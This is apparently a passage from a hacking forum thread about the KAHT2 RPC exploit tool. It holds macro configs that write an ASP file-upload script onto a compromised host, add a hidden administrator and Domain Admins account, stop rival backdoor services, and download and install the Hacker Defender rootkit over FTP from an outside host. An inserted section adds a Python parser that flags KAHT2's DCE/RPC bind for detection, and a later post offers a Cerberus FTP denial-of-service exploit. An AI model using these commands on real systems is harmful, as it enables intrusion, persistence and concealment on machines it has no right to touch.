cmd=@echo Set SeparateFields = Fields >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type) >>upload.inc
cmd=@echo Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";")) >>upload.inc
cmd=@echo Name = (SeparateField(Head, "name=", ";")) >>upload.inc
cmd=@echo If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2) >>upload.inc
cmd=@echo FileName = (SeparateField(Head, "filename=", ";")) >>upload.inc
cmd=@echo If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2) >>upload.inc
cmd=@echo Content_Type = LTrim(SeparateField(Head, "content-type:", ";")) >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function SeparateField(From, ByVal sStart, ByVal sEnd) >>upload.inc
cmd=@echo Dim PosB, PosE, sFrom >>upload.inc
cmd=@echo sFrom = LCase(From) >>upload.inc
cmd=@echo PosB = InStr(sFrom, sStart) >>upload.inc
cmd=@echo If PosB ^> 0 Then >>upload.inc
cmd=@echo PosB = PosB + Len(sStart) >>upload.inc
cmd=@echo PosE = InStr(PosB, sFrom, sEnd) >>upload.inc
cmd=@echo If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf) >>upload.inc
cmd=@echo If PosE = 0 Then PosE = Len(sFrom) + 1 >>upload.inc
cmd=@echo SeparateField = Mid(From, PosB, PosE - PosB) >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo SeparateField = Empty >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function GetFileName(FullPath) >>upload.inc
cmd=@echo Dim Pos, PosF >>upload.inc
cmd=@echo PosF = 0 >>upload.inc
cmd=@echo For Pos = Len(FullPath) To 1 Step -1 >>upload.inc
cmd=@echo Select Case Mid(FullPath, Pos, 1) >>upload.inc
cmd=@echo Case "/", "\": PosF = Pos + 1: Pos = 0 >>upload.inc
cmd=@echo End Select >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo If PosF = 0 Then PosF = 1 >>upload.inc
cmd=@echo GetFileName = Mid(FullPath, PosF) >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function BinaryToString(Binary) >>upload.inc
cmd=@echo dim cl1, cl2, cl3, pl1, pl2, pl3 >>upload.inc
cmd=@echo Dim L >>upload.inc
cmd=@echo cl1 = 1 >>upload.inc
cmd=@echo cl2 = 1 >>upload.inc
cmd=@echo cl3 = 1 >>upload.inc
cmd=@echo L = LenB(Binary) >>upload.inc
cmd=@echo Do While cl1^<=L >>upload.inc
cmd=@echo pl3 = pl3 ^& Chr(AscB(MidB(Binary,cl1,1))) >>upload.inc
cmd=@echo cl1 = cl1 + 1 >>upload.inc
cmd=@echo cl3 = cl3 + 1 >>upload.inc
cmd=@echo if cl3^>300 then >>upload.inc
cmd=@echo pl2 = pl2 ^& pl3 >>upload.inc
cmd=@echo pl3 = "" >>upload.inc
cmd=@echo cl3 = 1 >>upload.inc
cmd=@echo cl2 = cl2 + 1 >>upload.inc
cmd=@echo if cl2^>200 then >>upload.inc
cmd=@echo pl1 = pl1 ^& pl2 >>upload.inc
cmd=@echo pl2 = "" >>upload.inc
cmd=@echo cl2 = 1 >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Loop >>upload.inc
cmd=@echo BinaryToString = pl1 ^& pl2 ^& pl3 >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function BinaryToStringold(Binary) >>upload.inc
cmd=@echo Dim I, S >>upload.inc
cmd=@echo For I = 1 To LenB(Binary) >>upload.inc
cmd=@echo S = S ^& Chr(AscB(MidB(Binary, I, 1))) >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo BinaryToString = S >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function StringToBinary(String) >>upload.inc
cmd=@echo Dim I, B >>upload.inc
cmd=@echo For I=1 to len(String) >>upload.inc
cmd=@echo B = B ^& ChrB(Asc(Mid(String,I,1))) >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo StringToBinary = B >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function vbsSaveAs(FileName, ByteArray) >>upload.inc
cmd=@echo Dim FS, TextStream>>upload.inc
cmd=@echo Set FS = CreateObject("Scripting.FileSystemObject") >>upload.inc
cmd=@echo Set TextStream = FS.CreateTextFile(FileName) >>upload.inc
cmd=@echo TextStream.Write BinaryToString(ByteArray) >>upload.inc
cmd=@echo TextStream.Close >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo ^ >>upload.inc
cmd=@echo ^<script RUNAT=SERVER LANGUAGE=JSCRIPT^> >>upload.inc
cmd=@echo function CreateUploadField(){ return new uf_Init() } >>upload.inc
cmd=@echo function uf_Init(){ >>upload.inc
cmd=@echo this.Name = null >>upload.inc
cmd=@echo this.ContentDisposition = null >>upload.inc
cmd=@echo this.FileName = null >>upload.inc
cmd=@echo this.FilePath = null >>upload.inc
cmd=@echo this.ContentType = null >>upload.inc
cmd=@echo this.Value = null >>upload.inc
cmd=@echo this.Length = null >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function CreateBinaryData(){ return new bin_Init() } >>upload.inc
cmd=@echo function bin_Init(){ >>upload.inc
cmd=@echo this.ByteArray = null >>upload.inc
cmd=@echo this.Length = null >>upload.inc
cmd=@echo this.String = jsBinaryToString >>upload.inc
cmd=@echo this.SaveAs = jsSaveAs >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function jsBinaryToString(){ >>upload.inc
cmd=@echo return BinaryToString(this.ByteArray) >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function jsSaveAs(FileName){ >>upload.inc
cmd=@echo return vbsSaveAs(FileName, this.ByteArray) >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo ^>>upload.inc

[Macro]
name=Adduser
key=!5
delay=500
cmd=net user SUPPORT_3569a74r KaHTSecuritycheck/add
cmd=net localgroup Administradores SUPPORT_3569a74r /add
cmd=net localgroup Administrators SUPPORT_3569a74r /add
cmd=net group "Domain Admins" SUPPORT_3569a74r /add

[Macro]
name=Killhax0rs
key=!6
delay=500
cmd=net stop serv-u
cmd=net stop r_server
cmd=net stop "DAmeware 2.6"
cmd=net stop "RA Server"
cmd=net stop firedaemon....

[Macro]
name=upload_FTP
key=!9
delay=300
cmd=echo open xx.xx.xxx.xx 1212>a
cmd=echo ftp>>a
cmd=echo ftp>>a
cmd=echo bin>>a
cmd=echo get hxdef.exe>>a
cmd=echo get hxdef.ini>>a
cmd=echo bye>>a
cmd=ftp -s:a
delay=5000
cmd=dir c:\ /a
cmd=dir d:\ /a
cmd=dir e:\ /a
cmd=hxdef.exe -:installonly
cmd=del a
cmd=net start hackerdefender
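The first packet KAHT2 sends on TCP/135 is the bindstr[] array in the listing above: a DCE/RPC bind to the ISystemActivator interface, which is the interface MS03-026 exploits go through. A sensor that decodes bind PDUs can name the interface instead of just seeing "traffic to port 135". The parser below is an added example and is not part of the original post or the KAHT2 source; it decodes that exact 72-byte array, and the constant names (ISYSTEMACTIVATOR, NDR_TRANSFER_SYNTAX, KAHT2_BINDSTR) are my own.

```python
"""Decode a DCE/RPC connection-oriented bind PDU and report the interface
the client is binding to.  Added example, not part of the original post:
it parses the bindstr[] packet from the KAHT2 listing and flags a bind to
ISystemActivator so a sensor on TCP/135 can raise it for investigation."""
import struct
import uuid

PTYPE_BIND = 0x0B

# Interface UUIDs as carried on the wire (little-endian field order).
ISYSTEMACTIVATOR = uuid.UUID('000001a0-0000-0000-c000-000000000046')
NDR_TRANSFER_SYNTAX = uuid.UUID('8a885d04-1ceb-11c9-9fe8-08002b104860')

# bindstr[] from the KAHT2 source above, 72 bytes.
KAHT2_BINDSTR = bytes([
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
    0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00,
])


def _syntax(buf, off):
    """Decode a p_syntax_id_t: 16-byte UUID plus major/minor version."""
    if off + 20 > len(buf):
        raise ValueError('truncated syntax id')
    iface = uuid.UUID(bytes_le=buf[off:off + 16])
    major, minor = struct.unpack_from('<HH', buf, off + 16)
    return iface, (major, minor)


def parse_bind(buf):
    """Return a dict describing a bind PDU; raise ValueError if malformed."""
    if len(buf) < 28:
        raise ValueError('PDU shorter than bind header')
    ver, _minor, ptype, flags = struct.unpack_from('<BBBB', buf, 0)
    if ver != 5 or ptype != PTYPE_BIND:
        raise ValueError('not a DCE/RPC v5 bind PDU')
    # packed_drep byte 0: high nibble 1 = little-endian integers
    if (buf[4] & 0xF0) != 0x10:
        raise ValueError('big-endian drep not handled here')
    frag_len, auth_len, call_id = struct.unpack_from('<HHI', buf, 8)
    if frag_len > len(buf):
        raise ValueError('frag_length exceeds captured data')
    max_xmit, max_recv, assoc = struct.unpack_from('<HHI', buf, 16)
    n_ctx = buf[24]              # followed by 3 bytes of padding
    off = 28
    contexts = []
    for _ in range(n_ctx):
        if off + 4 > frag_len:
            raise ValueError('truncated context list')
        ctx_id, n_ts = struct.unpack_from('<HB', buf, off)
        off += 4                 # ctx id, n transfer syntaxes, reserved byte
        abstract, abs_ver = _syntax(buf, off)
        off += 20
        transfers = []
        for _ in range(n_ts):
            ts, ts_ver = _syntax(buf, off)
            off += 20
            transfers.append((ts, ts_ver))
        contexts.append({'id': ctx_id, 'abstract': abstract,
                         'version': abs_ver, 'transfer': transfers})
    return {'flags': flags, 'frag_length': frag_len, 'auth_length': auth_len,
            'call_id': call_id, 'max_xmit': max_xmit, 'max_recv': max_recv,
            'assoc_group': assoc, 'contexts': contexts}


def binds_isystemactivator(buf):
    """True if any presentation context in the bind targets ISystemActivator."""
    try:
        pdu = parse_bind(buf)
    except ValueError:
        return False
    return any(c['abstract'] == ISYSTEMACTIVATOR for c in pdu['contexts'])


if __name__ == '__main__':
    pdu = parse_bind(KAHT2_BINDSTR)
    for c in pdu['contexts']:
        print(f"ctx {c['id']}: {c['abstract']} v{c['version'][0]}.{c['version'][1]}")
    print('ISystemActivator bind:', binds_isystemactivator(KAHT2_BINDSTR))
```

A bind to ISystemActivator on its own is not proof of an attack: ordinary remote DCOM activation uses the same interface, so the value of the decode is in correlation (an external source binding here, followed by an oversized request on the same connection, then a new listener or outbound connection from the host) rather than in alerting on the bind alone.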
15.03.2006 - 18:47
de1ay
QUOTE: they said "aha" and everyone dropped it!
No, not dropped. Cerberus FTP Server 2.32 Denial of Service Exploit. Exploit: attached as .txt
Attached files
Cerberus_FTP_Server_2.32_Denial_of_Service_Exploit.rar ( 1.04kb )
Downloads: 79